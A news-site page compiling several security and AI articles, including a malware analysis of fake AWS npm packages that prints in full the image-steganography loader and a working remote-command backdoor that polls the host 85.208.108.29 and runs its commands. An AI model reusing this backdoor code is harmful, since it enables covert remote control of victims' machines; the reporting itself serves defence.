Biz & IT

Vulnerability in Cisco Smart Software Manager lets attackers change any user password

GET YER PATCH —

Yep, passwords for administrators can be changed, too.

Cisco on Wednesday disclosed a maximum-severity vulnerability that allows remote threat actors with no authentication to change the password of any user, including administrators, on Cisco Smart Software Manager On-Prem devices.

The Cisco Smart Software Manager On-Prem resides inside the customer premises and provides a dashboard for managing licenses for all Cisco gear in use. It’s used by customers who can’t or don’t want to manage licenses in the cloud, as is more common.

In a bulletin, Cisco warns that the product contains a vulnerability that allows hackers to change any account’s password. The severity of the vulnerability, tracked as CVE-2024-20419, is rated 10, the maximum score.

“This vulnerability is due to improper implementation of the password-change process,” the Cisco bulletin stated. “An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow an attacker to access the web UI or API with the privileges of the compromised user.”

There are no workarounds available to mitigate the threat.

It’s unclear precisely what an attacker can do after gaining administrative control over the device. One possibility is that the web user interface and application programming interface the attacker gains administrative control over make it possible to pivot to other Cisco devices connected to the same network and, from there, steal data, encrypt files, or perform similar actions. Cisco representatives didn’t immediately respond to an email. This post will be updated if a response comes later.

A security update linked to the bulletin fixes the vulnerability. Cisco said it isn’t aware of any evidence that the vulnerability is being actively exploited.

Here’s how carefully concealed backdoor in fake AWS files escaped mainstream notice

DEVS IN THE CROSSHAIRS —

Files available on the open source NPM repository underscore a growing sophistication.

Researchers have determined that two fake AWS packages downloaded hundreds of times from the open source NPM JavaScript repository contained carefully concealed code that backdoored developers’ computers when executed.

The packages—img-aws-s3-object-multipart-copy and legacyaws-s3-object-multipart-copy—were attempts to appear as aws-s3-object-multipart-copy, a legitimate JavaScript library for copying files using Amazon’s S3 cloud service. The fake files included all the code found in the legitimate library but added an additional JavaScript file named loadformat.js. That file provided what appeared to be benign code and three JPG images that were processed during package installation. One of those images contained code fragments that, when reconstructed, formed code for backdooring the developer device.

Growing sophistication

“We have reported these packages for removal, however the malicious packages remained available on npm for nearly two days,” researchers from Phylum, the security firm that spotted the packages, wrote. “This is worrying as it implies that most systems are unable to detect and promptly report on these packages, leaving developers vulnerable to attack for longer periods of time.”

In an email, Phylum Head of Research Ross Bryant said img-aws-s3-object-multipart-copy received 134 downloads before it was taken down. The other file, legacyaws-s3-object-multipart-copy, got 48.

The care the package developers put into the code and the effectiveness of their tactics underscores the growing sophistication of attacks targeting open source repositories, which besides NPM have included PyPI, GitHub, and RubyGems. The advances made it possible for the vast majority of malware-scanning products to miss the backdoor sneaked into these two packages. In the past 17 months, threat actors backed by the North Korean government have targeted developers twice, one of those using a zero-day vulnerability.

Phylum researchers provided a deep-dive analysis of how the concealment worked:

Analyzing the loadformat.js file, we find what appears to be some fairly innocuous image analysis code.

However, upon closer review, we see that this code is doing a few interesting things, resulting in execution on the victim machine.

After reading the image file from the disk, each byte is analyzed. Any bytes with a value between 32 and 126 are converted from Unicode values into a character and appended to the analyzepixels variable.

function processImage(filePath) {
    console.log("Processing image...");
    const data = fs.readFileSync(filePath);
    let analyzepixels = "";
    let convertertree = false;

    for (let i = 0; i < data.length; i++) {
        const value = data[i];
        if (value >= 32 && value <= 126) {
            analyzepixels += String.fromCharCode(value);
        } else {
            if (analyzepixels.length > 2000) {
                convertertree = true;
                break;
            }
            analyzepixels = "";
        }
    }
    // ...

The threat actor then defines two distinct bodies of a function and stores each in their own variables, imagebyte and analyzePixels.

let analyzePixels = `
    if (false) {
        exec("node -v", (error, stdout, stderr) => {
            console.log(stdout);
        });
    }
    console.log("check nodejs version...");
`;

let imagebyte = `
    const httpsOptions = {
        hostname: 'cloudconvert.com',
        path: '/image-converter',
        method: 'POST'
    };
    const req = https.request(httpsOptions, res => {
        console.log('Status Code:', res.statusCode);
    });
    req.on('error', error => {
        console.error(error);
    });
    req.end();
    console.log("Executing operation...");
`;

If convertertree is set to true, imagebyte is set to analyzepixels. In plain language, if convertertree is set, it will execute whatever is contained in the script we extracted from the image file.

if (convertertree) {
    console.log("Optimization complete. Applying advanced features...");
    imagebyte = analyzepixels;
} else {
    console.log("Optimization complete. No advanced features applied.");
}

Looking back above, we note that convertertree will be set to true if the length of the bytes found in the image is greater than 2,000.

if (analyzepixels.length > 2000) {
    convertertree = true;
    break;
}

The author then creates a new function using either code that sends an empty POST request to cloudconvert.com or initiates executing whatever was extracted from the image files.

const func = new Function('https', 'exec', 'os', imagebyte);
func(https, exec, os);

The lingering question is, what is contained in the images that this is trying to execute?

Command-and-Control in a JPEG

Looking at the bottom of the loadformat.js file, we see the following:

processImage('logo1.jpg');
processImage('logo2.jpg');
processImage('logo3.jpg');

We find these three files in the package’s root, which are included below without modification, unless otherwise noted.

  • Appears as logo1.jpg in the package
  • Appears as logo2.jpg in the package
  • Appears as logo3.jpg in the package (modified here, as the file is corrupted and in some cases would not display properly)

If we run each of these through the processImage(...) function from above, we find that the Intel image (i.e., logo1.jpg) does not contain enough “valid” bytes to set the convertertree variable to true. The same goes for logo3.jpg, the AMD logo. However, for the Microsoft logo (logo2.jpg), we find the following, formatted for readability:

let fetchInterval = 0x1388;
let intervalId = setInterval(fetchAndExecuteCommand, fetchInterval);

const clientInfo = {
    'name': os.hostname(),
    'os': os.type() + " " + os.release()
};

const agent = new https.Agent({
    'rejectUnauthorized': false
});

function registerClient() {
    const _0x47c6de = JSON.stringify(clientInfo);
    const _0x5a10c1 = {
        'hostname': "85.208.108.29",
        'port': 0x1bb,
        'path': "/register",
        'method': "POST",
        'headers': {
            'Content-Type': "application/json",
            'Content-Length': Buffer.byteLength(_0x47c6de)
        },
        'agent': agent
    };
    const _0x38f695 = https.request(_0x5a10c1, _0x454719 => {
        console.log("Registered with server as " + clientInfo.name);
    });
    _0x38f695.on("error", _0x1159ec => {
        console.error("Problem with registration: " + _0x1159ec.message);
    });
    _0x38f695.write(_0x47c6de);
    _0x38f695.end();
}

function fetchAndExecuteCommand() {
    const _0x2dae30 = {
        'hostname': "85.208.108.29",
        'port': 0x1bb,
        'path': "/get-command?clientId=" + encodeURIComponent(clientInfo.name),
        'method': "GET",
        'agent': agent
    };
    https.get(_0x2dae30, _0x4a0c09 => {
        let _0x41cd12 = '';
        _0x4a0c09.on("data", _0x5cbbc5 => {
            _0x41cd12 += _0x5cbbc5.toString();
        });
        _0x4a0c09.on("end", () => {
            console.log("Received command:", _0x41cd12);
            if (_0x41cd12.startsWith('setInterval:')) {
                const _0x1e3896 = parseInt(_0x41cd12.split(':')[0x1], 0xa);
                if (!isNaN(_0x1e3896) && _0x1e3896 > 0x0) {
                    clearInterval(intervalId);
                    fetchInterval = _0x1e3896 * 0x3e8;
                    intervalId = setInterval(fetchAndExecuteCommand, fetchInterval);
                    console.log("Interval has been updated to " + _0x1e3896 + " seconds.");
                } else {
                    console.log("Invalid interval command received.");
                }
            } else if (_0x41cd12.startsWith("cd ")) {
                const _0x58bd7d = _0x41cd12.substring(0x3).trim();
                try {
                    process.chdir(_0x58bd7d);
                    console.log("Changed directory to " + process.cwd());
                } catch (_0x2ee272) {
                    console.error("Change directory failed: " + _0x2ee272);
                }
            } else if (_0x41cd12 !== "No commands") {
                exec(_0x41cd12, {
                    'cwd': process.cwd()
                }, (_0x5da676, _0x1ae10c, _0x46788b) => {
                    let _0x4a96cd = _0x1ae10c;
                    if (_0x5da676) {
                        console.error("exec error: " + _0x5da676);
                        _0x4a96cd += "\nError: " + _0x46788b;
                    }
                    postResult(_0x4a96cd);
                });
            } else {
                console.log("No commands to execute");
            }
        });
    }).on("error", _0x2e8190 => {
        console.error("Got error: " + _0x2e8190.message);
    });
}

function postResult(_0x1d73c1) {
    const _0xc05626 = {
        'hostname': "85.208.108.29",
        'port': 0x1bb,
        'path': "/post-result?clientId=" + encodeURIComponent(clientInfo.name),
        'method': "POST",
        'headers': {
            'Content-Type': "text/plain",
            'Content-Length': Buffer.byteLength(_0x1d73c1)
        },
        'agent': agent
    };
    const _0x2fcb05 = https.request(_0xc05626, _0x448ba6 => {
        console.log("Result sent to the server");
    });
    _0x2fcb05.on('error', _0x1f60a7 => {
        console.error("Problem with request: " + _0x1f60a7.message);
    });
    _0x2fcb05.write(_0x1d73c1);
    _0x2fcb05.end();
}

registerClient();

This code first registers the new client with the remote C2 by sending the following clientInfo to 85.208.108.29.

const clientInfo = {
    'name': os.hostname(),
    'os': os.type() + " " + os.release()
};

It then sets up an interval that periodically loops through and fetches commands from the attacker every 5 seconds.

let fetchInterval = 0x1388;
let intervalId = setInterval(fetchAndExecuteCommand, fetchInterval);

Received commands are executed on the device, and the output is sent back to the attacker on the /post-result?clientId= endpoint.

One of the most innovative methods in recent memory for concealing an open source backdoor was discovered in March, just weeks before it was to be included in a production release of XZ Utils, a data-compression utility available on almost all installations of Linux. The backdoor was implemented through a five-stage loader that used a series of simple but clever techniques to hide itself. Once installed, the backdoor allowed the threat actors to log in to infected systems with administrative system rights.

The person or group responsible spent years working on the backdoor. Besides the sophistication of the concealment method, the entity devoted large amounts of time to producing high-quality code for open source projects in a successful effort to build trust with other developers.

In May, Phylum disrupted a separate campaign that backdoored a package available in PyPI that also used steganography, a technique that embeds secret code into images.
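Steganographic payloads of this sort leave a measurable fingerprint: long, unbroken runs of printable ASCII inside files that should be mostly binary. As a rough illustration (this is a minimal sketch, not Phylum’s tooling), the Node.js snippet below turns the same printable-byte heuristic the loadformat.js loader used into a detection check; the 2,000-byte threshold mirrors the one the malware itself keyed on, and the file names are illustrative.

const fs = require('fs');

// Return the longest run of consecutive printable-ASCII bytes in a file.
function longestPrintableRun(filePath) {
    const data = fs.readFileSync(filePath);
    let run = 0;
    let longest = 0;
    for (const byte of data) {
        if (byte >= 32 && byte <= 126) {
            run += 1;
            if (run > longest) longest = run;
        } else {
            run = 0;
        }
    }
    return longest;
}

// Genuine JPEGs rarely contain thousands of consecutive printable bytes;
// the backdoored package relied on exactly this property to find its payload.
for (const file of ['logo1.jpg', 'logo2.jpg', 'logo3.jpg']) {
    if (longestPrintableRun(file) > 2000) {
        console.warn(`${file}: suspiciously long text run; possible embedded script`);
    }
}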

“In the last few years, we’ve seen a dramatic rise in the sophistication and volume of malicious packages published to open source ecosystems,” Phylum researchers wrote. “Make no mistake, these attacks are successful. It is absolutely imperative that developers and security organizations alike are keenly aware of this fact and are deeply vigilant with regard to open source libraries they consume.”

Microsoft CTO Kevin Scott thinks LLM “scaling laws” will hold despite criticism

As the word turns —

Will LLMs keep improving if we throw more compute at them? OpenAI dealmaker thinks so.

Kevin Scott, CTO and EVP of AI at Microsoft, speaks onstage during Vox Media’s 2023 Code Conference at The Ritz-Carlton, Laguna Niguel, on September 27, 2023, in Dana Point, California.

During an interview with Sequoia Capital’s Training Data podcast published last Tuesday, Microsoft CTO Kevin Scott doubled down on his belief that so-called large language model (LLM) “scaling laws” will continue to drive AI progress, despite some skepticism in the field that progress has leveled out. Scott played a key role in forging a $13 billion technology-sharing deal between Microsoft and OpenAI.

“Despite what other people think, we’re not at diminishing marginal returns on scale-up,” Scott said. “And I try to help people understand there is an exponential here, and the unfortunate thing is you only get to sample it every couple of years because it just takes a while to build supercomputers and then train models on top of them.”

LLM scaling laws refer to patterns explored by OpenAI researchers in 2020 showing that the performance of language models tends to improve predictably as the models get larger (more parameters), are trained on more data, and have access to more computational power (compute). The laws suggest that simply scaling up model size and training data can lead to significant improvements in AI capabilities without necessarily requiring fundamental algorithmic breakthroughs.
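The canonical parameter-count form of the law from that 2020 paper (Kaplan et al.) is L(N) ≈ (Nc/N)^αN, where L is test loss and N is the number of parameters. A small sketch of how smoothly, and how slowly, that curve falls, using the paper’s fitted constants; the output is purely illustrative, since real-world loss also depends on data and compute:

// Kaplan et al. (2020) parameter scaling law: L(N) = (Nc / N)^alphaN.
// The constants below are the paper's fitted values; numbers are illustrative.
const Nc = 8.8e13;      // fitted constant, in parameters
const alphaN = 0.076;   // fitted exponent

const predictedLoss = (n) => Math.pow(Nc / n, alphaN);

for (const n of [1e9, 1e10, 1e11, 1e12]) {
    console.log(`${n.toExponential(0)} params -> predicted loss ${predictedLoss(n).toFixed(3)}`);
}
// Each 10x increase in parameters multiplies predicted loss by
// 10^-0.076 ≈ 0.84 -- steady gains, but only while scale keeps compounding.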

Since then, other researchers have challenged the idea of persisting scaling laws over time, but the concept is still a cornerstone of OpenAI’s AI development philosophy.

You can see Scott’s comments in the video below beginning around 46:05:

Microsoft CTO Kevin Scott on how far scaling laws will extend

Scott’s optimism contrasts with a narrative among some critics in the AI community that progress in LLMs has plateaued around GPT-4 class models. That perception has been fueled by largely informal observations—and some benchmark results—about recent models like Google’s Gemini 1.5 Pro, Anthropic’s Claude Opus, and even OpenAI’s GPT-4o, which some argue haven’t shown the dramatic leaps in capability seen in earlier generations, suggesting that LLM development may be approaching diminishing returns.

“We all know that GPT-3 was vastly better than GPT-2. And we all know that GPT-4 (released thirteen months ago) was vastly better than GPT-3,” wrote AI critic Gary Marcus in April. “But what has happened since?”

The perception of plateau

Scott’s stance suggests that tech giants like Microsoft still feel justified in investing heavily in larger AI models, betting on continued breakthroughs rather than hitting a capability plateau. Given Microsoft’s investment in OpenAI and strong marketing of its own Microsoft Copilot AI features, the company has a strong interest in maintaining the perception of continued progress, even if the tech stalls.

Frequent AI critic Ed Zitron recently wrote in a post on his blog that one defense of continued investment into generative AI is that “OpenAI has something we don’t know about. A big, sexy, secret technology that will eternally break the bones of every hater.” He added: “Yet, I have a counterpoint: no it doesn’t.”

Some perceptions of slowing progress in LLM capabilities and benchmarking may be due to the rapid onset of AI in the public eye when, in fact, LLMs have been developing for years prior. OpenAI continued to develop LLMs during a roughly three-year gap between the release of GPT-3 in 2020 and GPT-4 in 2023. Many people likely perceived a rapid jump in capability with GPT-4’s launch in 2023 because they had only become recently aware of GPT-3-class models with the launch of ChatGPT in late November 2022, which used GPT-3.5.

In the podcast interview, the Microsoft CTO pushed back against the idea that AI progress has stalled, but he acknowledged the challenge of infrequent data points in this field, as new models often take years to develop. Despite this, Scott expressed confidence that future iterations will show improvements, particularly in areas where current models struggle.

“The next sample is coming, and I can’t tell you when, and I can’t predict exactly how good it’s going to be, but it will almost certainly be better at the things that are brittle right now, where you’re like, oh my god, this is a little too expensive, or a little too fragile, for me to use,” Scott said in the interview. “All of that gets better. It’ll get cheaper, and things will become less fragile. And then more complicated things will become possible. That is the story of each generation of these models as we’ve scaled up.”

Google makes it easier for users to switch on advanced account protection

APP MADE EASIER —

The strict requirement for two physical keys is now eased when passkeys are used.

Google is making it easier for people to lock down their accounts with strong multifactor authentication by adding the option to store secure cryptographic keys in the form of passkeys rather than on physical token devices.

Google’s Advanced Protection Program, introduced in 2017, requires the strongest form of multifactor authentication (MFA). Whereas many forms of MFA rely on one-time passcodes sent through SMS or emails or generated by authenticator apps, accounts enrolled in advanced protection require MFA based on cryptographic keys stored on a secure physical device. Unlike one-time passcodes, security keys stored on physical devices are immune to credential phishing and can’t be copied or sniffed.

Democratizing APP

APP, short for Advanced Protection Program, requires the key to be accompanied by a password whenever a user logs into an account on a new device. The protection prevents the types of account takeovers that allowed Kremlin-backed hackers to access the Gmail accounts of Democratic officials in 2016 and go on to leak stolen emails to interfere with the presidential election that year.

Until now, Google required people to have two physical security keys to enroll in APP. Now, the company is allowing people to instead use two passkeys or one passkey and one physical token. Those seeking further security can enroll using as many keys as they want.

“We’re expanding the aperture so people have more choice in how they enroll in this program,” Shuvo Chatterjee, the project lead for APP, told Ars. He said the move comes in response to comments Google has received from some users who either couldn’t afford to buy the physical keys or lived or worked in regions where they’re not available.

As always, users must still have two keys to enroll to prevent being locked out of accounts if one of them is lost or broken. While lockouts are always a problem, they can be much worse for APP users because the recovery process is much more rigorous and takes much longer than for accounts not enrolled in the program.

Passkeys are the creation of the FIDO Alliance, a cross-industry group made up of hundreds of companies. They’re stored locally on a device and can also be stored in the same type of hardware token that stores MFA keys. Passkeys can’t be extracted from the device and require either a PIN or a scan of a fingerprint or face. They provide two factors of authentication: something the user knows—the underlying password used when the passkey was first generated—and something the user has—the device storing the passkey.
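For developers, passkey enrollment runs through the standard WebAuthn API rather than anything Google-specific. Below is a minimal browser-side sketch; the relying-party details and challenge handling are placeholders, since a real deployment fetches its challenge from the server and verifies the attestation there.

// Minimal sketch of passkey creation via WebAuthn. All identifiers
// (example.com, user fields) are placeholder assumptions.
const publicKey = {
    challenge: crypto.getRandomValues(new Uint8Array(32)), // normally issued by the server
    rp: { name: "Example RP", id: "example.com" },
    user: {
        id: crypto.getRandomValues(new Uint8Array(16)),
        name: "user@example.com",
        displayName: "Example User"
    },
    pubKeyCredParams: [{ type: "public-key", alg: -7 }], // ES256
    authenticatorSelection: {
        residentKey: "required",      // a discoverable credential, i.e. a passkey
        userVerification: "required"  // PIN or biometric gate on the device
    }
};

navigator.credentials.create({ publicKey })
    .then((cred) => console.log("Created passkey credential:", cred.id))
    .catch((err) => console.error("Enrollment failed:", err));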

Of course, the relaxed requirements only go so far, since users still must have two devices. But by expanding the types of devices that qualify, APP becomes more accessible, since many people already have a phone and a computer, Chatterjee said.

“If you’re in a place where you can’t get security keys, it’s more convenient,” he explained. “This is a step toward democratizing how much access [users] get to this highest security tier Google offers.”

Despite the increased scrutiny involved in the recovery process for APP accounts, Google is renewing its recommendation that users provide a phone number and email address as backup.

“The most resilient thing to do is have multiple things on file, so if you lose that security key or the key blows up, you have a way to get back into your account,” Chatterjee said. He’s not providing the “secret sauce” details about how the process works, but he said it involves “tons of signals we look at to figure out what’s really happening.

“Even if you do have a recovery phone, a recovery phone by itself isn’t going to get you access to your account,” he said. “So if you get SIM swapped, it doesn’t mean someone gets access to your account. It’s a combination of various factors. It’s the summation of that that will help you on your path to recovery.”

Google users can enroll in APP by visiting this link.

OpenAI reportedly nears breakthrough with “reasoning” AI, reveals progress framework

studies in hype-otheticals —

Five-level AI classification system probably best seen as a marketing exercise.

OpenAI recently unveiled a five-tier system to gauge its advancement toward developing artificial general intelligence (AGI), according to an OpenAI spokesperson who spoke with Bloomberg. The company shared this new classification system on Tuesday with employees during an all-hands meeting, aiming to provide a clear framework for understanding AI advancement. However, the system describes hypothetical technology that does not yet exist and is possibly best interpreted as a marketing move to garner investment dollars.

OpenAI has previously stated that AGI—a nebulous term for a hypothetical AI system that could perform novel tasks like a human without specialized training—is currently the company’s primary goal. The pursuit of technology that can replace humans at most intellectual work drives most of the enduring hype over the firm, even though such a technology would likely be wildly disruptive to society.

OpenAI CEO Sam Altman has previously stated his belief that AGI could be achieved within this decade, and a large part of the CEO’s public messaging has been related to how the company (and society in general) might handle the disruption that AGI may bring. Along those lines, a ranking system to communicate AI milestones achieved internally on the path to AGI makes sense.

OpenAI’s five levels—which it plans to share with investors—range from current AI capabilities to systems that could potentially manage entire organizations. The company believes its technology (such as GPT-4o that powers ChatGPT) currently sits at Level 1, which encompasses AI that can engage in conversational interactions. However, OpenAI executives reportedly told staff they’re on the verge of reaching Level 2, dubbed “Reasoners.”

Bloomberg lists OpenAI’s five “Stages of Artificial Intelligence” as follows:

  • Level 1: Chatbots, AI with conversational language
  • Level 2: Reasoners, human-level problem solving
  • Level 3: Agents, systems that can take actions
  • Level 4: Innovators, AI that can aid in invention
  • Level 5: Organizations, AI that can do the work of an organization

A Level 2 AI system would reportedly be capable of basic problem-solving on par with a human who holds a doctorate degree but lacks access to external tools. During the all-hands meeting, OpenAI leadership reportedly demonstrated a research project using their GPT-4 model that the researchers believe shows signs of approaching this human-like reasoning ability, according to someone familiar with the discussion who spoke with Bloomberg.

The upper levels of OpenAI’s classification describe increasingly potent hypothetical AI capabilities. Level 3 “Agents” could work autonomously on tasks for days. Level 4 systems would generate novel innovations. The pinnacle, Level 5, envisions AI managing entire organizations.

This classification system is still a work in progress. OpenAI plans to gather feedback from employees, investors, and board members, potentially refining the levels over time.

Ars Technica asked OpenAI about the ranking system and the accuracy of the Bloomberg report, and a company spokesperson said they had “nothing to add.”

The problem with ranking AI capabilities

OpenAI isn’t alone in attempting to quantify levels of AI capabilities. As Bloomberg notes, OpenAI’s system feels similar to levels of autonomous driving mapped out by automakers. And in November 2023, researchers at Google DeepMind proposed their own five-level framework for assessing AI advancement, showing that other AI labs have also been trying to figure out how to rank things that don’t yet exist.

OpenAI’s classification system also somewhat resembles Anthropic’s “AI Safety Levels” (ASLs) first published by the maker of the Claude AI assistant in September 2023. Both systems aim to categorize AI capabilities, though they focus on different aspects. Anthropic’s ASLs are more explicitly focused on safety and catastrophic risks (such as ASL-2, which refers to “systems that show early signs of dangerous capabilities”), while OpenAI’s levels track general capabilities.

However, any AI classification system raises questions about whether it’s possible to meaningfully quantify AI progress and what constitutes an advancement (or even what constitutes a “dangerous” AI system, as in the case of Anthropic). The tech industry so far has a history of overpromising AI capabilities, and linear progression models like OpenAI’s potentially risk fueling unrealistic expectations.

There is currently no consensus in the AI research community on how to measure progress toward AGI or even if AGI is a well-defined or achievable goal. As such, OpenAI’s five-tier system should likely be viewed as a communications tool to entice investors that shows the company’s aspirational goals rather than a scientific or even technical measurement of progress.

Exim vulnerability affecting 1.5 million servers lets attackers attach malicious files

GIRD YOUR LOINS —

Based on past attacks, it wouldn’t be surprising to see active targeting this time, too.

More than 1.5 million email servers are vulnerable to attacks that can deliver executable attachments to user accounts, security researchers said.

The servers run versions of the Exim mail transfer agent that are vulnerable to a critical flaw that came to light 10 days ago. Tracked as CVE-2024-39929 and carrying a severity rating of 9.1 out of 10, the vulnerability makes it trivial for threat actors to bypass protections that normally prevent the sending of attachments that install apps or execute code. Such protections are a first line of defense against malicious emails designed to install malware on end-user devices.

A serious security issue

“I can confirm this bug,” Exim project team member Heiko Schlittermann wrote on a bug-tracking site. “It looks like a serious security issue to me.”

Researchers at security firm Censys said Wednesday that of the more than 6.5 million public-facing SMTP email servers appearing in Internet scans, 4.8 million of them (roughly 74 percent) run Exim. More than 1.5 million of the Exim servers, or roughly 31 percent, are running a vulnerable version of the open-source mail app.

While there are no known reports of active exploitation of the vulnerability, it wouldn’t be surprising to see active targeting, given the ease of attacks and the large number of vulnerable servers. In 2020, one of the world’s most formidable hacking groups—the Kremlin-backed Sandworm—exploited a severe Exim vulnerability tracked as CVE-2019-10149, which allowed them to send emails that executed malicious code that ran with unfettered root system rights. The attacks began in August 2019, two months after the vulnerability came to light. They continued through at least May 2020.

CVE-2024-39929 stems from an error in the way Exim parses multiline headers as specified in RFC 2231. Threat actors can exploit it to bypass extension blocking and deliver executable attachments in emails sent to end users. The vulnerability exists in all Exim versions up to and including 4.97.1. A fix is available in the Release Candidate 3 of Exim 4.98.
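Neither Exim nor the researchers have published a proof of concept, but RFC 2231’s “parameter continuation” mechanism—the feature at issue—splits a single filename across numbered header fragments. The hypothetical header below illustrates the general shape of the problem: a parser that fails to reassemble the fragments never sees the extension a blocklist is looking for.

Content-Type: application/octet-stream
Content-Disposition: attachment;
 filename*0="quarterly-report";
 filename*1=".exe"

A compliant parser reassembles the name as quarterly-report.exe; a parser that inspects only the first fragment sees no blocked extension at all.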

Given the requirement that end users must click on an attached executable for the attack to work, this Exim vulnerability isn’t as serious as the one that was exploited starting in 2019. That said, social engineering people remains among the most effective attack methods. Admins should assign a high priority to updating to the latest version.

Intuit’s AI gamble: Mass layoff of 1,800 paired with hiring spree

In the name of AI —

Intuit CEO: “Companies that aren’t prepared to take advantage of [AI] will fall behind.”

On Wednesday, Intuit CEO Sasan Goodarzi announced in a letter to the company that it would be laying off 1,800 employees—about 10 percent of its workforce of around 18,000—while simultaneously planning to hire the same number of new workers as part of a major restructuring effort purportedly focused on AI.

“As I’ve shared many times, the era of AI is one of the most significant technology shifts of our lifetime,” wrote Goodarzi in a blog post on Intuit’s website. “This is truly an extraordinary time—AI is igniting global innovation at an incredible pace, transforming every industry and company in ways that were unimaginable just a few years ago. Companies that aren’t prepared to take advantage of this AI revolution will fall behind and, over time, will no longer exist.”

The CEO says Intuit is in a position of strength and that the layoffs are not cost-cutting related, but they allow the company to “allocate additional investments to our most critical areas to support our customers and drive growth.” With new hires, the company expects its overall headcount to grow in its 2025 fiscal year.

Intuit’s layoffs (which collectively qualify as a “mass layoff” under the WARN Act) hit various departments within the company, including the closure of Intuit’s offices in Edmonton, Canada, and Boise, Idaho, affecting over 250 employees. Approximately 1,050 employees are being laid off because they’re “not meeting expectations,” according to Goodarzi’s letter. Intuit has also eliminated more than 300 roles across the company to “streamline” operations and shift resources toward AI, and the company plans to consolidate 80 tech roles to “sites where we are strategically growing our technology teams and capabilities,” such as Atlanta, Bangalore, New York, Tel Aviv, and Toronto.

In turn, the company plans to accelerate investments in its AI-powered financial assistant, Intuit Assist, which provides AI-generated financial recommendations. The company also plans to hire new talent in engineering, product development, data science, and customer-facing roles, with a particular emphasis on AI expertise.

Not just about AI

Despite Goodarzi’s heavily AI-focused message, the restructuring at Intuit reveals a more complex picture. A closer look at the layoffs shows that many of the 1,800 job cuts stem from performance-based departures (such as the aforementioned 1,050). The restructuring also includes a 10 percent reduction in executive positions at the director level and above (“To continue increasing our velocity of decision making,” Goodarzi says).

These numbers suggest that the reorganization may also serve as an opportunity for Intuit to trim its workforce of underperforming staff, using the AI hype cycle as a compelling backdrop for a broader house-cleaning effort.

But as far as CEOs are concerned, it’s always a good time to talk about how they’re embracing the latest, hottest thing in technology: “With the introduction of GenAI,” Goodarzi wrote, “we are now delivering even more compelling customer experiences, increasing monetization potential, and driving efficiencies in how the work gets done within Intuit. But it’s just the beginning of the AI revolution.”

In bid to loosen Nvidia’s grip on AI, AMD to buy Finnish startup for $665M

AI tech stack —

The acquisition is the largest of its kind in Europe in a decade.

AMD is to buy Finnish artificial intelligence startup Silo AI for $665 million in one of the largest such takeovers in Europe as the US chipmaker seeks to expand its AI services to compete with market leader Nvidia.

California-based AMD said Silo’s 300-member team would use its software tools to build custom large language models (LLMs), the kind of AI technology that underpins chatbots such as OpenAI’s ChatGPT and Google’s Gemini. The all-cash acquisition is expected to close in the second half of this year, subject to regulatory approval.

“This agreement helps us both accelerate our customer engagements and deployments while also helping us accelerate our own AI tech stack,” Vamsi Boppana, senior vice president of AMD’s artificial intelligence group, told the Financial Times.

The acquisition is the largest of a privately held AI startup in Europe since Google acquired UK-based DeepMind for around 400 million pounds in 2014, according to data from Dealroom.

The deal comes at a time when buyouts by Silicon Valley companies have come under tougher scrutiny from regulators in Brussels and the UK. Europe-based AI startups, including Mistral, DeepL, and Helsing, have raised hundreds of millions of dollars this year as investors seek out a local champion to rival US-based OpenAI and Anthropic.

Helsinki-based Silo AI, which is among the largest private AI labs in Europe, offers tailored AI models and platforms to enterprise customers. The Finnish company launched an initiative last year to build LLMs in European languages, including Swedish, Icelandic, and Danish.

AMD’s AI technology competes with that of Nvidia, which has taken the lion’s share of the high-performance chip market. Nvidia’s success has propelled its valuation past $3 trillion this year as tech companies push to build the computing infrastructure needed to power the biggest AI models. AMD started to roll out its MI300 chips late last year in a direct challenge to Nvidia’s “Hopper” line of chips.

Peter Sarlin, Silo AI co-founder and chief executive, called the acquisition the “logical next step” as the Finnish group seeks to become a “flagship” AI company.

Silo AI is committed to “open source” AI models, which are available for free and can be customized by anyone. This distinguishes it from the likes of OpenAI and Google, which favor their own proprietary or “closed” models.

The startup previously described its family of open models, called “Poro,” as an important step toward “strengthening European digital sovereignty” and democratizing access to LLMs.

The concentration of the most powerful LLMs into the hands of a few US-based Big Tech companies is meanwhile attracting attention from antitrust regulators in Washington and Brussels.

The Silo deal shows AMD seeking to scale its business quickly and drive customer engagement with its own offering. AMD views Silo, which builds custom models for clients, as a link between its “foundational” AI software and the real-world applications of the technology.

Software has become a new battleground for semiconductor companies as they try to lock in customers to their hardware and generate more predictable revenues, outside the boom-and-bust chip sales cycle.

Nvidia’s success in the AI market stems from its multibillion-dollar investment in Cuda, its proprietary software that allows chips originally designed for processing computer graphics and video games to run a wider range of applications.

Since starting to develop Cuda in 2006, Nvidia has expanded its software platform to include a range of apps and services, largely aimed at corporate customers that lack the in-house resources and skills that Big Tech companies have to build on its technology.

Nvidia now offers more than 600 “pre-trained” models, meaning they are simpler for customers to deploy. The Santa Clara, California-based group last month started rolling out a “microservices” platform, called NIM, which promises to let developers build chatbots and AI “co-pilot” services quickly.

Historically, Nvidia has offered its software free of charge to buyers of its chips, but said this year that it planned to charge for products such as NIM.

AMD is among several companies contributing to the development of an OpenAI-led rival to Cuda, called Triton, which would let AI developers switch more easily between chip providers. Meta, Microsoft, and Intel have also worked on Triton.

© 2024 The Financial Times Ltd. All rights reserved. Please do not copy and paste FT articles and redistribute by email or post to the web.

New Blast-RADIUS attack breaks 30-year-old protocol used in networks everywhere

AUTHENTICATION PROTOCOL SHATTERED —

Ubiquitous RADIUS scheme uses homegrown authentication based on MD5. Yup, you heard right.

One of the most widely used network protocols is vulnerable to a newly discovered attack that can allow adversaries to gain control over a range of environments, including industrial controllers, telecommunications services, ISPs, and all manner of enterprise networks.

Short for Remote Authentication Dial-In User Service, RADIUS harkens back to the days of dial-in Internet and network access through public switched telephone networks. It has remained the de facto standard for lightweight authentication ever since and is supported in virtually all switches, routers, access points, and VPN concentrators shipped in the past two decades. Despite its early origins, RADIUS remains an essential staple for managing client-server interactions for:

  • VPN access
  • DSL and fiber-to-the-home connections offered by ISPs
  • Wi-Fi and 802.1X authentication
  • 2G and 3G cellular roaming
  • 5G Data Network Name authentication
  • Mobile data offloading
  • Authentication over private APNs for connecting mobile devices to enterprise networks
  • Authentication to critical infrastructure management devices
  • Eduroam and OpenRoaming Wi-Fi

RADIUS provides seamless interaction between clients—typically routers, switches, or other appliances providing network access—and a central RADIUS server, which acts as the gatekeeper for user authentication and access policies. The purpose of RADIUS is to provide centralized authentication, authorization, and accounting management for remote logins.

